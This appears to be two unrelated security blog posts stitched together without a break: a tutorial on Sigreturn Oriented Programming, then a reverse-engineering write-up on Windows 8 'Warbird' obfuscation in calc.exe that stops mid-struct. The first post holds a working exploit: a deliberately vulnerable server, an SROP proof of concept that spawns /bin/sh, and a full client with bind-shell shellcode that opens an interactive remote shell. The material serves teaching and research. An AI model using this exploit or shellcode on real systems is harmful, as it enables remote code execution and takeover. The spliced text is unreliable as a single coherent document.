Playing with signals : An overview on Sigreturn Oriented Programming

Introduction

Back to last GreHack edition, Herbert Bos has presented a novel technique to exploit stack-based overflows more reliably on Linux. We review hereafter this new exploitation technique and provide an exploit along with the vulnerable server. Even if this technique is portable to multiple platforms, we will focus on a 64-bit Linux OS in this blog post.

All sample code used in this blogpost is available for download through the following archive.

We’ve got a signal

When the kernel delivers a signal, it creates a frame on the stack where it stores the current execution context (flags, registers, etc.) and then gives the control to the signal handler. After handling the signal, the kernel calls sigreturn to resume the execution. More precisely, the kernel uses the following structure pushed previously on the stack to recover the process context. A closer look at this structure is given by figure 1.

typedef struct ucontext {
    unsigned long int    uc_flags;
    struct ucontext     *uc_link;
    stack_t              uc_stack;
    mcontext_t           uc_mcontext;
    __sigset_t           uc_sigmask;
    struct _libc_fpstate __fpregs_mem;
} ucontext_t;

Now, let’s debug the following program (sig.c) to see what really happens when handling a signal on Linux. This program simply registers a signal handler to manage SIGINT signals.

#include <stdio.h>
#include <signal.h>

void handle_signal(int signum)
{
    printf("handling signal: %d\n", signum);
}

int main()
{
    signal(SIGINT, (void *)handle_signal);
    printf("catch me if you can\n");
    while(1) {}
    return 0;
}

/* struct definition for debugging purpose */
struct sigcontext sigcontext;

First of all, we need to tell gdb to not intercept this signal:

gdb$ handle SIGINT nostop pass
Signal        Stop      Print   Pass to program Description
SIGINT        No        Yes     Yes             Interrupt

Then, we set a breakpoint at the signal handling function, start the program and hit CTRLˆC to reach the signal handler code.

gdb$ b handle_signal
Breakpoint 1 at 0x4005a7: file sig.c, line 6.
gdb$ r
Starting program: /home/mtalbi/sig 
hit CTRL^C to catch me
^C
Program received signal SIGINT, Interrupt.

Breakpoint 1, handle_signal (signum=0x2) at sig.c:6
6               printf("handling signal: %d", signum);
gdb$ bt
#0  handle_signal (signum=0x2) at sig.c:6
#1  <signal handler called>
#2  main () at sig.c:13

We note here that the frame #1 is created in order to resume the process execution at the point where it was interrupted before. This is confirmed by checking the instructions pointed by rip which corresponds to sigreturn syscall:

gdb$ frame 1
#1  <signal handler called>
gdb$ x/2i $rip
=> 0x7ffff7a844f0:      mov    $0xf,%rax
   0x7ffff7a844f7:      syscall 

Figure 1 shows the stack at signal handling function entry point.

srop-stack
Figure 1: Stack at signal handling function entry point

We can check the values of some saved registers and flags. Note that sigcontext structure is the same as uc_mcontext structure. It is located at rbp + 7 * 8 according to figure 1. It holds saved registers and flags value:

gdb$ frame 0
...
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rip 
$5 = 0x4005da
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rsp
$6 = 0x7fffffffe110
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->rax
$7 = 0x17
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->cs
$8 = 0x33
gdb$ p ((struct sigcontext *)($rbp + 7 * 8))->eflags
$9 = 0x202

Now, we can verify that after handling the signal, registers will recover their values:

gdb$ b 13
Breakpoint 2 at 0x4005da: file sig.c, line 13.
gdb$ c
Continuing.
handling signal: 2

Breakpoint 2, main () at sig.c:13
13              while(1) {}
gdb$ i r
...
rax            0x17     0x17
rsp            0x7fffffffe110   0x7fffffffe110
eflags         0x202    [ IF ]
cs             0x33     0x33
...

Exploitation

If we manage to overflow a saved instruction pointer with sigreturn address and forge a uc mcontext structure by adjusting registers and flags values, then we can execute any syscall. It may be a litte confusing here. In effect, trying to execute a syscall by returning on another syscall (sigreturn) may be strange at first sight. Well, the main difference here is that the latter does not require any parameters at all. All we need is a gadget that sets rax to 0xf to run any system call through sigreturn syscall. Gadgets are small pieces of instructions ending with a ret instruction. These gadgets are chained together to perform a specific action. This technique is well-known as ROP: Return-Oriented Programming [Sha07].

Surprisingly, it is quite easy to find a syscall ; ret gadget on some Linux distribution where the vsyscall map is still in use. The vsyscall page is mapped at fixed location into all user-space processes. For interested readers, here is good link about vsyscall.

mtalbi@mtalbi:/home/mtalbi/srop$ cat /proc/self/maps
...
7ffffe5ff000-7ffffe600000 r-xp 00000000 00:00 0         [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
...
gdb$ x/3i 0xffffffffff600000
   0xffffffffff600000:  mov    rax,0x60
   0xffffffffff600007:  syscall 
   0xffffffffff600009:  ret 

Bosman and Bos list in [BB14] locations of sigreturn and syscall gadgets for different operating systems including FreeBSD and Mac OS X.

Assumed that we found the required gadgets, we need to arrange our payload as shown in figure 3 in order to successfully exploit a classic stack-based overflow. Note that zeroes should be allowed in the payload (e.g. a non strcpy vulnerability); otherwise, we need to find a way to zero some parts of uc_mcontext structure.

The following code (srop.c) is a proof of concept of sigreturn oriented programming that starts a /bin/sh shell:

#include <stdio.h>
#include <string.h>
#include <signal.h>

#define SYSCALL 0xffffffffff600007

struct ucontext ctx;
char *shell[] = {"/bin/sh", NULL};

void gadget();

int main()
{
    unsigned long *ret;

    /* initializing the context structure */
    bzero(&ctx, sizeof(struct ucontext));

    /* setting rip value (points to syscall address) */
    ctx.uc_mcontext.gregs[16] = SYSCALL;

    /* setting 0x3b in rax (execve syscall) */
    ctx.uc_mcontext.gregs[13] = 0x3b;

    /* setting first arg of execve in rdi */
    ctx.uc_mcontext.gregs[8] = shell[0];

    /* setting second arg of execv in rsi */
    ctx.uc_mcontext.gregs[9] = shell;

    /* cs = 0x33 */
    ctx.uc_mcontext.gregs[18] = 0x33;

    /* overflowing */
    ret = (unsigned long *)&ret + 2;
    *ret = (int)gadget + 4; //skip gadget's function prologue
    *(ret + 1) = SYSCALL;
    memcpy(ret + 2, &ctx, sizeof(struct ucontext));
    return 0;
}

void gadget()
{
    asm("mov $0xf,%rax\n");
    asm("retq\n");
}

The programm fills a uc_mcontext structure with execve syscall parameters. Additionally, the cs register is set to 0x33:

  • Instruction pointer rip points to syscall; ret gadget.
  • rax register holds execve syscall number.
  • rdi register holds the first paramater of execve (“/bin/sh” address).
  • rsi register holds the second parameter of execve (“/bin/sh” arguments).
  • rdx register holds the last parameter of execve (zeroed at struture initialization).

Then, the program overflows the saved rip pointer with mov %rax, $0xf; ret gadget address (added artificially to the program through gadget function). This gadget is followed by the syscall gadget address. So, when the main function will return, these two gadgets will be executed resulting in sigreturn system call which will set registers values from the previously filled structure. After sigreturn, execve will be called as rip points now to syscall gadget and rax holds the syscall number of execve. In our example, execve will start /bin/sh shell.

Code

In this section we provide a vulnerable server (server.c) and use the SROP technique to exploit it (exploit.c).

Vulnerable server

The following program is a simple server that replies back with a welcoming message after receiving some data from client. The vulnerability is present in the handle_conn function where we can read more data from client (4096 bytes) than the destination array (input) can hold (1024 bytes). The program is therefore vulnerable to a classical stack-based overflow.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#define PAGE_SIZE 0x1000
#define PORT 7777

// in .bss
char data[PAGE_SIZE * 2];

void init()
{
	struct sockaddr_in sa;;
	int s, c, size, k = 1;

	sa.sin_family = AF_INET;
	sa.sin_port = htons(PORT);
	sa.sin_addr.s_addr = INADDR_ANY;

	size = sizeof(struct sockaddr);

	if((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		handle_error("socket failed\n");
	}

	if(setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &k, sizeof(int)) == -1) {
		handle_error("setsockopt failed\n");
  }

	if(bind(s, (struct sockaddr *)&sa, size)) {
		handle_error("bind failed\n");
	}

	if(listen(s, 3) < 0) {
		handle_error("listen failed\n");
	}

	while(1) {
		if((c = accept(s, (struct sockaddr *)NULL, NULL)) < 0) {
			handle_error("accept failed\n");
		}
		handle_conn(c);
	}
}

int handle_conn(int c)
{
	char input[0x400];
	int amt;
	//too large data !!!
	if((amt = read(c, input, PAGE_SIZE) < 0)) {
		handle_error("receive failed\n");
	}
	memcpy(data, input, PAGE_SIZE);
	welcome(c);
	close(c);
	return 0;

}

int welcome(int c)
{
	int amt;
	const char *msg = "I'm vulnerable program running with root priviledges!!\nPlease do not exploit me";

	write(c, msg, strlen(msg));

	if((amt = write(c, data, strlen(data))) < 0) {
		handle_error("send failed\n");
	}
	return 0;
}

int handle_error(char *msg)
{
	perror(msg);
	exit(-1);
}

void gadget()
{
	asm("mov $0xf,%rax\n");
	asm("retq\n");
}

int main()
{
	init();
	return 0;
}

Exploit

We know that our payload will be copied in a fixed location in .bss. (at 0x6012c0). Our strategy is to copy a shellcode there and then call mprotect syscall in order to change page protection starting at 0x601000 (must be a multiple ot the page size).

srop-bss
Figure 2: Payload copied in .bss

In this exploit, we overflow our vulnerable buffer as shown by figure 3. First, we fill our buffer with a nop sled (not necessary) followed by a classical bindshell. This executable payload is prepended with an address pointing to the shellcode in .bss (see figure 2).

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/mman.h>
#include <errno.h>

#define HOSTNAME         "localhost";
#define PORT             7777
#define POWN             31337
#define SIZE             0x400 + 8*2

#define SYSCALL_GADGET   0xffffffffff600007
#define RAX_15_GADGET    0x400ad3
#define DATA             0x6012c0
#define MPROTECT_BASE    0x601000	//must be a multiple of page_size (in .bss)
#define MPROTECT_SYSCALL 0xa
#define FLAGS            0x33
#define PAGE_SIZE        4096

#define COLOR_SHELL      "\033[31;01mbind-shell\033[00m > "

struct payload_t {
	unsigned long   ret;
	char            nopshell[SIZE];
	unsigned long   gadget;
	unsigned long   sigret;
	struct ucontext context;
};

unsigned char shellcode[] =	"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
							"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
							"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
							"\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
							"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
							"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
							"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
							"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
							"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
							"\x5f\x6a\x3b\x58\x0f\x05";

int setsock(char *hostname, int port);
void session(int s);
void overflows(int s);
int handle_error(char *msg);

int main(int argc, char **argv)
{
	int s;
	printf("[1] connecting to target ... \n");
	s = setsock(HOSTNAME, PORT);
	printf("[+] connected \n");
	printf("[2] overflowing ... \n");
	overflows(s);
	s = setsock(HOSTNAME, POWN);
	session(s);
	return 0;
}

void overflows(int s)
{
	struct payload_t payload;
	char output[0x400];

	memset(payload.nopshell, 0x90, SIZE);
	strncpy(payload.nopshell, shellcode, strlen(shellcode));

	payload.ret = DATA + 0x8; //precise address of nop sled
	payload.gadget = RAX_15_GADGET;
	payload.sigret = SYSCALL_GADGET;

	/* initializing the context structure */
	bzero(&payload.context, sizeof(struct ucontext));

	/* setting first arg of mprotect in rdi */
	payload.context.uc_mcontext.gregs[8] = MPROTECT_BASE;

	/* setting second arg of mprotect in rsi */
	payload.context.uc_mcontext.gregs[9] = PAGE_SIZE;

	/* setting third arg of mprotect in rdx */
	payload.context.uc_mcontext.gregs[12] = PROT_READ | PROT_WRITE | PROT_EXEC;

	/* setting mprotect syscall number in rax */
	payload.context.uc_mcontext.gregs[13] = MPROTECT_SYSCALL;

	/*
	 * jumping into nop sled after mprotect syscall.
	 * setting rsp value
	 */
	payload.context.uc_mcontext.gregs[15] = DATA;

	/* setting rip value (points to syscall address) */
	payload.context.uc_mcontext.gregs[16] = SYSCALL_GADGET;

	/* cs = 0x33 */
	payload.context.uc_mcontext.gregs[18] = FLAGS;

	write(s, &payload, sizeof(payload));

	read(s, output, 0x400);
}

int setsock(char *hostname, int port)
{
	int sock;
	struct hostent *hent;
	struct sockaddr_in sa;
	struct in_addr ia;

	hent = gethostbyname(hostname);
	if(hent) {
		memcpy(&ia.s_addr, hent->h_addr, 4);
	}
	else if((ia.s_addr = inet_addr(hostname)) == INADDR_ANY) {
		handle_error("incorrect address !!!\n");
	}

	if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		handle_error("socket failed !!!\n");
	}

	sa.sin_family = AF_INET;
	sa.sin_port = htons(port);
	sa.sin_addr.s_addr = ia.s_addr;

	if(connect(sock, (struct sockaddr *)&sa, sizeof(sa)) == -1) {
		handle_error("connection failed !!!!\n");
	}

	return sock;
}

void session(int s)
{
	char buf[1024];
	int amt;

	fd_set fds;

	printf("[!] enjoy your shell \n");
	fputs(COLOR_SHELL, stderr);
	FD_ZERO(&fds);
	while(1) {
		FD_SET(s, &fds);
		FD_SET(0, &fds);
		select(s+1, &fds, NULL, NULL, NULL);

		if(FD_ISSET(0, &fds)) {
			if((amt = read(0, buf, 1024)) == 0) {
				handle_error("connection lost\n");
			}
			buf[amt] = '\0';
			write(s, buf, strlen(buf));
		}

		if(FD_ISSET(s, &fds)) {
			if((amt = read(s, buf, 1024)) == 0) {
				handle_error("connection lost\n");
			}
			buf[amt] = '\0';
			printf("%s", buf);
			fputs(COLOR_SHELL, stderr);
		}
	}
}

int handle_error(char *msg)
{
	perror(msg);
	exit(-1);
}

Our goal is to change protection of memory page containing our shellcode. More precisely, we want to make the following call so that we can execute our shellcode:

mmprotect(0x601000, 4096, PROT_READ | PROT_WRITE | PROT_EXEC);

Here, is what happens when the vulnerable function returns:

  1. The artificial gadget is executed. It sets rax register to 15.
  2. Our artificial gadget is followed by a syscall gadget that will result in a sigreturn call.
  3. The sigreturn uses our fake uc_mcontext structure to restore registers values. Only non shaded parameters in figure 3 are relevant to the exploit. After this call, rip points to syscall gadget, rax is set to mprotect syscall number, and rdi, rsi and rdx hold the parameters of mprotect function. Additionally, rsp points to our payload in .bss.
  4. mprotect syscall is executed.
  5. ret instruction of syscall gadget is executed. This instruction will set instruction pointer to the address popped from rsp. This address points to our shellcode (see figure 2).
  6. The shellcode is executed.
srop-exploit
Figure 3: Stack after overflowing input buffer

Replaying the exploit

The above code has been compiled using gcc (gcc -g -o server.c server) on a Debian Wheezy running on x_86_64 arch. Before reproducing this exploit, you need to adjust first the following addresses:

  • SYSCALL_GADGET
mtalbi@mtalbi:/home/mtalbi/srop$ cat /proc/self/maps
...
7ffffe5ff000-7ffffe600000 r-xp 00000000 00:00 0         [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
...
gdb$ x/3i 0xffffffffff600000
   0xffffffffff600000:  mov    rax,0x60
   0xffffffffff600007:  syscall 
   0xffffffffff600009:  ret
  • RAX_15_GADGET
mtalbi@mtalbi:/home/mtalbi/srop$ gdb server
(gdb) disas gadget
Dump of assembler code for function gadget:
   0x0000000000400acf <+0>:     push   %rbp
   0x0000000000400ad0 <+1>:     mov    %rsp,%rbp
   0x0000000000400ad3 <+4>:     mov    $0xf,%rax
   0x0000000000400ada <+11>:    retq   
   0x0000000000400adb <+12>:    pop    %rbp
   0x0000000000400adc <+13>:    retq   
End of assembler dump.
  • DATA
(gdb) p &data
$1 = (char (*)[8192]) 0x6012c0

References

[BB14] Erik Bosman and Herbert Bos. We got signal. a return to portable exploits. (working title, subject to change.). In Security & Privacy (Oakland), San Jose, CA, USA, May 2014. IEEE.

[Sha07] Hovav Shacham. The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86). In Proceedings of the 14th ACM Conference on Computer and Communications Security, CCS ’07, pages 552– 561, New York, NY, USA, 2007. ACM.

Warbird Operation

Introduction

Some time ago while working on Windows 8, we came across a rather unusual piece of disassembly in some Microsoft binary files. This post describes some of our findings and how they are related to a Windows internal project called Warbird

Warbird is an enhancement of the license verification of Windows that is introduced in Windows 8/2012. The former system was too easy to intercept and to fake, so Microsoft decided to provide something that is harder to reverse engineer and to fake.

API Lookup

Our investigation begins in the “Windows Calculator” binary file (32-bit version of calc.exe). We found the following piece of disassembly in the WinMain function, which basically contains the code of the program when it is executed:

002a95e0 64a130000000 mov eax,dword ptr fs:[00000030h]
...
002a95ea 8b400c mov eax,dword ptr [eax+0Ch]
002a95ed 83c00c add eax,0Ch

These instructions allow accessing the Ldr (which stands for Loader) field of the current process PEB (Process Environment Block). This field gives access to the list of loaded modules of the current running process.

In a legitimate process, the list of loaded modules shouldn’t be accessed directly. It is either internally used by the Windows loader when it needs to load a binary file in memory and resolve its external dependencies, or used by the LoadLibrary function that can be called by any program.

In a malicious code that is executed when exploiting software vulnerability, the attacker needs to access the list of modules in order to retrieve operating system functions’ address. This listing enables the attacker to perform malicious actions (such as writing a malicious binary file on the file system). To do so, malicious code uses undocumented features in order to access directly the list of loaded modules thanks to the instructions previously noted.

This technique is also used by some packers. Initially packers were used to shrink executable file sizes. Nowadays, they are also used by malware to escape antivirus’ technologies based on signatures.

In this particular context, this technique seems to be used to retrieve required function addresses in a stealthy way.

Back to the Windows Calculator, the list of functions to resolve is contained in a buffer. The buffer will be dynamically decoded at process runtime and thus cannot be extracted from the raw binary file. When the function resolution process begins, the decoded buffer is:


00c48ed8 67 00 64 00 69 00 33 00-32 00 2e 00 64 00 6c 00 g.d.i.3.2...d.l.
00c48ee8 6c 00 00 00 12 00 00 00-42 69 74 42 6c 74 00 43 l.......BitBlt.C
00c48ef8 72 65 61 74 65 43 6f 6d-70 61 74 69 62 6c 65 42 reateCompatibleB
00c48f08 69 74 6d 61 70 00 43 72-65 61 74 65 43 6f 6d 70 itmap.CreateComp
00c48f18 61 74 69 62 6c 65 44 43-00 43 72 65 61 74 65 44 atibleDC.CreateD
00c48f28 49 42 53 65 63 74 69 6f-6e 00 43 72 65 61 74 65 IBSection.Create
00c48f38 46 6f 6e 74 49 6e 64 69-72 65 63 74 57 00 43 72 FontIndirectW.Cr
00c48f48 65 61 74 65 53 6f 6c 69-64 42 72 75 73 68 00 44 eateSolidBrush.D
00c48f58 65 6c 65 74 65 44 43 00-44 65 6c 65 74 65 4f 62 eleteDC.DeleteOb
00c48f68 6a 65 63 74 00 47 64 69-41 6c 70 68 61 42 6c 65 ject.GdiAlphaBle
00c48f78 6e 64 00 47 64 69 47 72-61 64 69 65 6e 74 46 69 nd.GdiGradientFi
00c48f88 6c 6c 00 47 65 74 43 75-72 72 65 6e 74 4f 62 6a ll.GetCurrentObj
00c48f98 65 63 74 00 47 65 74 44-49 42 69 74 73 00 47 65 ect.GetDIBits.Ge
00c48fa8 74 44 65 76 69 63 65 43-61 70 73 00 47 65 74 4f tDeviceCaps.GetO
00c48fb8 62 6a 65 63 74 57 00 47-65 74 53 74 6f 63 6b 4f bjectW.GetStockO
00c48fc8 62 6a 65 63 74 00 53 65-6c 65 63 74 4f 62 6a 65 bject.SelectObje
00c48fd8 63 74 00 53 65 74 42 6b-4d 6f 64 65 00 53 65 74 ct.SetBkMode.Set
00c48fe8 54 65 78 74 43 6f 6c 6f-72 00 6b 00 65 00 72 00 TextColor.k.e.r.
00c48ff8 6e 00 65 00 6c 00 33 00-32 00 2e 00 64 00 6c 00 n.e.l.3.2...d.l.
00c49008 6c 00 00 00 0a 00 00 00-47 65 74 4c 6f 63 61 6c l.......GetLocal
00c49018 65 49 6e 66 6f 45 78 00-47 65 74 55 73 65 72 50 eInfoEx.GetUserP
00c49028 72 65 66 65 72 72 65 64-55 49 4c 61 6e 67 75 61 referredUILangua
00c49038 67 65 73 00 4c 43 49 44-54 6f 4c 6f 63 61 6c 65 ges.LCIDToLocale
00c49048 4e 61 6d 65 00 4c 6f 63-61 6c 65 4e 61 6d 65 54 Name.LocaleNameT
00c49058 6f 4c 43 49 44 00 4d 75-6c 44 69 76 00 4d 75 6c oLCID.MulDiv.Mul
00c49068 74 69 42 79 74 65 54 6f-57 69 64 65 43 68 61 72 tiByteToWideChar
00c49078 00 50 6f 77 65 72 43 6c-65 61 72 52 65 71 75 65 .PowerClearReque
00c49088 73 74 00 50 6f 77 65 72-43 72 65 61 74 65 52 65 st.PowerCreateRe
00c49098 71 75 65 73 74 00 50 6f-77 65 72 53 65 74 52 65 quest.PowerSetRe
00c490a8 71 75 65 73 74 00 53 6c-65 65 70 45 78 00 6e 00 quest.SleepEx.n.
00c490b8 74 00 64 00 6c 00 6c 00-2e 00 64 00 6c 00 6c 00 t.d.l.l...d.l.l.
00c490c8 00 00 01 00 00 00 57 69-6e 53 71 6d 41 64 64 54 ......WinSqmAddT
00c490d8 6f 53 74 72 65 61 6d 00-75 00 73 00 65 00 72 00 oStream.u.s.e.r.
00c490e8 33 00 32 00 2e 00 64 00-6c 00 6c 00 00 00 13 00 3.2...d.l.l.....
00c490f8 00 00 44 72 61 77 54 65-78 74 45 78 57 00 45 6e ..DrawTextExW.En
00c49108 75 6d 44 69 73 70 6c 61-79 53 65 74 74 69 6e 67 umDisplaySetting
00c49118 73 57 00 46 69 6c 6c 52-65 63 74 00 47 65 74 44 sW.FillRect.GetD
00c49128 43 00 47 65 74 44 43 45-78 00 47 65 74 44 65 73 C.GetDCEx.GetDes
00c49138 6b 74 6f 70 57 69 6e 64-6f 77 00 47 65 74 4d 6f ktopWindow.GetMo
00c49148 6e 69 74 6f 72 49 6e 66-6f 57 00 47 65 74 50 72 nitorInfoW.GetPr
00c49158 6f 63 65 73 73 57 69 6e-64 6f 77 53 74 61 74 69 ocessWindowStati
00c49168 6f 6e 00 47 65 74 53 79-73 43 6f 6c 6f 72 00 47 on.GetSysColor.G
00c49178 65 74 53 79 73 74 65 6d-4d 65 74 72 69 63 73 00 etSystemMetrics.
00c49188 47 65 74 54 68 72 65 61-64 44 65 73 6b 74 6f 70 GetThreadDesktop
00c49198 00 47 65 74 55 73 65 72-4f 62 6a 65 63 74 49 6e .GetUserObjectIn
00c491a8 66 6f 72 6d 61 74 69 6f-6e 57 00 49 6e 76 61 6c formationW.Inval
00c491b8 69 64 61 74 65 52 65 63-74 00 49 73 50 72 6f 63 idateRect.IsProc
00c491c8 65 73 73 44 50 49 41 77-61 72 65 00 4d 6f 6e 69 essDPIAware.Moni
00c491d8 74 6f 72 46 72 6f 6d 57-69 6e 64 6f 77 00 4f 66 torFromWindow.Of
00c491e8 66 73 65 74 52 65 63 74-00 52 65 64 72 61 77 57 fsetRect.RedrawW
00c491f8 69 6e 64 6f 77 00 52 65-6c 65 61 73 65 44 43 00 indow.ReleaseDC.
00c49208 53 79 73 74 65 6d 50 61-72 61 6d 65 74 65 72 73 SystemParameters
00c49218 49 6e 66 6f 57 00 00 ab-ab ab ab ab ab ab ab fe InfoW...........
00c49228 00 00 00 00 00 00 00 00-79 43 de af 6c 4a 00 00 ........yC..lJ..

The contents of the buffer are quite simple to understand. This is a list of structures containing:

  • The name of the DLL, in Unicode characters (in green);
  • The number of functions to resolve (in yellow) ;
  • The name of functions to resolve.

This last structure is indicated by a name containing 0.

Initially, unresolved functions point to stubs returning an error code and setting the last error to
ERROR_PROC_NOT_FOUND:

.text:0045D03B ; void * __stdcall WARBIRD_DELAY_LOAD::PowerCreateRequest(struct _REASON_CONTEXT *)
.text:0045D03B ?PowerCreateRequest@WARBIRD_DELAY_LOAD@@YGPAXPAU_REASON_CONTEXT@@@Z proc near
.text:0045D03B push ERROR_PROC_NOT_FOUND ; dwErrCode
.text:0045D03D call ds:__imp__SetLastError@4 ; SetLastError(x)
.text:0045D043 or eax, 0FFFFFFFFh
.text:0045D046 retn 4
.text:0045D046 ?PowerCreateRequest@WARBIRD_DELAY_LOAD@@YGPAXPAU_REASON_CONTEXT@@@Z endp

The available debugging symbols for Microsoft Calculator point to a rather unusual name: Warbird. We can infer this is the internal name of a project at Microsoft. We can dump the list of available symbols containing this name:

0:000> x calc!*warbird*
0100d021 calc!WARBIRD_DELAY_LOAD::GetDesktopWindow ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::DeleteDC ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::GetSystemMetrics ()
0102e920 calc!WARBIRD::g_FuncAddress =
0100d04e calc!WARBIRD_DELAY_LOAD::LocaleNameToLCID ()
0100d04e calc!WARBIRD_DELAY_LOAD::SelectObject ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::CreateSolidBrush ()
0100d00f calc!WARBIRD_DELAY_LOAD::GetUserObjectInformationW ()
0100d0c7 calc!WARBIRD_DELAY_LOAD::BitBlt ()
0102e2e0 calc!`WarbirdGetDecryptionCipher'::`2'::DecryptionCipher =
0100cffd calc!WARBIRD_DELAY_LOAD::CreateCompatibleBitmap ()
0100d031 calc!WARBIRD_DELAY_LOAD::GdiGradientFill ()
0100cfe5 calc!WARBIRD_DELAY_LOAD::RedrawWindow ()
0100d060 calc!WARBIRD_DELAY_LOAD::MulDiv ()
0100d04e calc!WARBIRD_DELAY_LOAD::SetTextColor ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::GetThreadDesktop ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::CreateCompatibleDC ()
0100d06b calc!WARBIRD_DELAY_LOAD::SystemParametersInfoW ()
0100d04e calc!WARBIRD_DELAY_LOAD::SleepEx ()
0100579e calc!WarbirdThreadCallback ()
0100cffd calc!WARBIRD_DELAY_LOAD::InvalidateRect ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::DeleteObject ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::GetStockObject ()
0100cffd calc!WARBIRD_DELAY_LOAD::GetDCEx ()
0100d021 calc!WARBIRD_DELAY_LOAD::IsProcessDPIAware ()
0100d07d calc!WARBIRD_DELAY_LOAD::MonitorFromWindow ()
0100d0b5 calc!WARBIRD_DELAY_LOAD::CreateDIBSection ()
0100d03b calc!WARBIRD_DELAY_LOAD::PowerCreateRequest ()
0100d087 calc!WARBIRD_DELAY_LOAD::GetDIBits ()
0100cffd calc!WARBIRD_DELAY_LOAD::FillRect ()
0100d099 calc!WARBIRD_DELAY_LOAD::GdiAlphaBlend ()
0100d06b calc!WARBIRD_DELAY_LOAD::GetLocaleInfoEx ()
010312f4 calc!g_WarbirdNotificationInformation =
0102ede0 calc!`WarbirdGetDecryptionKey'::`2'::nDecryptionKey =
0102edd8 calc!`WarbirdGetEncryptionKey'::`2'::nEncryptionKey =
0100d07d calc!WARBIRD_DELAY_LOAD::SetBkMode ()
0100d06b calc!WARBIRD_DELAY_LOAD::GetUserPreferredUILanguages ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::GetDC ()
0100d04e calc!WARBIRD_DELAY_LOAD::PowerClearRequest ()
0100cfef calc!WARBIRD_DELAY_LOAD::OffsetRect ()
0100d04e calc!WARBIRD_DELAY_LOAD::PowerSetRequest ()
0100d021 calc!WARBIRD_DELAY_LOAD::GetProcessWindowStation ()
0100cffd calc!WARBIRD_DELAY_LOAD::EnumDisplaySettingsW ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::CreateFontIndirectW ()
0100d04e calc!WARBIRD_DELAY_LOAD::ReleaseDC ()
0100d031 calc!WARBIRD_DELAY_LOAD::DrawTextExW ()
0100d04e calc!WARBIRD_DELAY_LOAD::GetDeviceCaps ()
0100d07d calc!WARBIRD_DELAY_LOAD::GetMonitorInfoW ()
0100cffd calc!WARBIRD_DELAY_LOAD::GetObjectW ()
0102e240 calc!`WarbirdGetEncryptionCipher'::`2'::EncryptionCipher =
0100d04e calc!WARBIRD_DELAY_LOAD::GetCurrentObject ()
0100d0a3 calc!WARBIRD_DELAY_LOAD::GetSysColor ()
0102dbe8 calc!`WarbirdSecureFunctionsInitialize'::`2'::g_InitFunctions =
0100d06b calc!WARBIRD_DELAY_LOAD::LCIDToLocaleName ()
00fe95d2 calc!WARBIRD::GetFunctionAddress ()
0100d0b5 calc!WARBIRD_DELAY_LOAD::MultiByteToWideChar ()
010312f8 calc!g_WarbirdPaintInitTime =

Once resolved, these functions point to the actual implementation in the appropriate dynamically loaded modules. Warbird code doesn’t try to load the referenced modules (gdi32.dll, kernel32.dll, ntdll.dll and user32.dll); they must be loaded by the hosting process before Warbird code resolves the functions’ addresses

We will not dive into the details of function address resolution. A good write-up can be found at the address http://www.rohitab.com/discuss/topic/40877-shellcoding-get-exported-function-pointer-from-name/ for people interested in understanding the techniques used to perform this action.

As part of this process, Microsoft also checks that the found base address looks like a valid PE file by checking some magic values in the header of the mapped file; malware authors are not so paranoiac and usually blindly trust the found base address.


Execution context

Once necessary functions are resolved, Warbird tries to determine if it has to be run on the machine. To do so, it checks the following conditions:

  • The program is not running in session 0 (i.e. the program is not a service);
  • The current window station name is ‘WinSta0’ (using the newly resolved functions GetProcessWindowStation and GetUserObjectInformationW) ;
  • The current desktop is ‘Default’ (using the newly resolved functions GetThreadDesktop and GetUserObjectInformationW).

Execution

After checking the execution context, the next step in the execution of Warbird code is related to a group of 3 associated functions: PowerCreateRequest, PowerSetRequest and PowerClearRequest.

These functions were introduced in Windows 7 and allow a program to be involved in the power management of the workstation. For example, the program can force the display to be always on even if the program is performing a lengthy operation.

PowerCreateRequest creates a request specifying the reason for the request. This function uses a parameter of type _REASON_CONTEXT (http://msdn.microsoft.com/en-us/library/windows/desktop/dd405536%28v=vs.85%29.aspx) that specifies the reason of the request:

typedef struct _REASON_CONTEXT {
ULONG Version;
DWORD Flags;
union {
struct {
HMODULE LocalizedReasonModule;
ULONG LocalizedReasonId;
ULONG ReasonStringCount;
LPWSTR *ReasonStrings;
} Detailed;
LPWSTR SimpleReasonString;
} Reason;
